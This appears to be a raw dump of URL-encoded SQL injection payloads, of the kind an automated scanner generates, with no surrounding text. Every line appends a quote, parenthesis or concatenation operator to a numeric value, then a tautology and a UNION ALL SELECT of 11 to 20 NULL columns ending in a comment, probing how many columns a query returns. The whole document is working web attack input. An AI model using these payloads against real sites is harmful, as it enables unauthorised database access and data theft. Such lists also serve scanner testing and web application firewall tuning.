1234.5%27%29%20WHERE%204483%3D4483%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201046%3D1046%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%209463%3D9463%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%208342%3D8342%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%209510%3D9510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201350%3D1350%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%205442%3D5442%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%208123%3D8123%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%203718%3D3718%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209219%3D9219%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%202966%3D2966%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%208586%3D8586%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209943%3D9943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%206034%3D6034%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%202431%3D2431%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%203439%3D3439%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%209318%3D9318%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208875%3D8875%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%201473%3D1473%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%202324%3D2324%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%201498%3D1498%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205431%3D5431%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%202960%3D2960%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204530%3D4530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208211%3D8211%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205458%3D5458%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20%7C%7C%20%28SELECT%205121%20FROM%20DUAL%20WHERE%203567%3D3567%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205828%20FROM%20DUAL%20WHERE%203473%3D3473%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201152%20FROM%20DUAL%20WHERE%205233%3D5233%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208598%20FROM%20DUAL%20WHERE%202628%3D2628%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204122%20FROM%20DUAL%20WHERE%208446%3D8446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203935%20FROM%20DUAL%20WHERE%206796%3D6796%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208496%20FROM%20DUAL%20WHERE%207158%3D7158%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206826%20FROM%20DUAL%20WHERE%202879%3D2879%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209064%20FROM%20DUAL%20WHERE%208390%3D8390%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209021%20FROM%20DUAL%20WHERE%202292%3D2292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202284%20WHERE%206464%3D6464%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202774%20WHERE%201404%3D1404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201907%20WHERE%201705%3D1705%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206156%20WHERE%201297%3D1297%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207533%20WHERE%203336%3D3336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208146%20WHERE%209943%3D9943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201675%20WHERE%203125%3D3125%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208594%20WHERE%204830%3D4830%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209038%20WHERE%203454%3D3454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202164%20WHERE%201931%3D1931%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203949%20FROM%20DUAL%20WHERE%202724%3D2724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205352%20FROM%20DUAL%20WHERE%206738%3D6738%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208713%20FROM%20DUAL%20WHERE%208889%3D8889%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207177%20FROM%20DUAL%20WHERE%203357%3D3357%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205624%20FROM%20DUAL%20WHERE%203337%3D3337%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207372%20FROM%20DUAL%20WHERE%205305%3D5305%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203627%20FROM%20DUAL%20WHERE%208554%3D8554%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209060%20FROM%20DUAL%20WHERE%206082%3D6082%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%204519%20FROM%20DUAL%20WHERE%203243%3D3243%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203984%20FROM%20DUAL%20WHERE%207482%3D7482%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207975%20WHERE%206003%3D6003%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206228%20WHERE%205726%3D5726%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206989%20WHERE%204432%3D4432%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209305%20WHERE%204830%3D4830%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207139%20WHERE%207747%3D7747%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208094%20WHERE%206731%3D6731%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203582%20WHERE%207987%3D7987%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202642%20WHERE%203133%3D3133%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%204937%20WHERE%205075%3D5075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202101%20WHERE%202841%3D2841%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27UdmD%27%20FROM%20DUAL%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ezWb%27%20FROM%20DUAL%20WHERE%208085%3D8085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kmRi%27%20FROM%20DUAL%20WHERE%207794%3D7794%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27pAdW%27%20FROM%20DUAL%20WHERE%204449%3D4449%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BUIj%27%20FROM%20DUAL%20WHERE%202992%3D2992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27PiNs%27%20FROM%20DUAL%20WHERE%206389%3D6389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27vlQz%27%20FROM%20DUAL%20WHERE%203101%3D3101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jlnR%27%20FROM%20DUAL%20WHERE%205157%3D5157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Qhnl%27%20FROM%20DUAL%20WHERE%201269%3D1269%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27oERH%27%20FROM%20DUAL%20WHERE%205441%3D5441%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Kqoo%27%20WHERE%208261%3D8261%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UiJC%27%20WHERE%203011%3D3011%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Pasv%27%20WHERE%207745%3D7745%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MuJn%27%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27DaYE%27%20WHERE%206303%3D6303%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 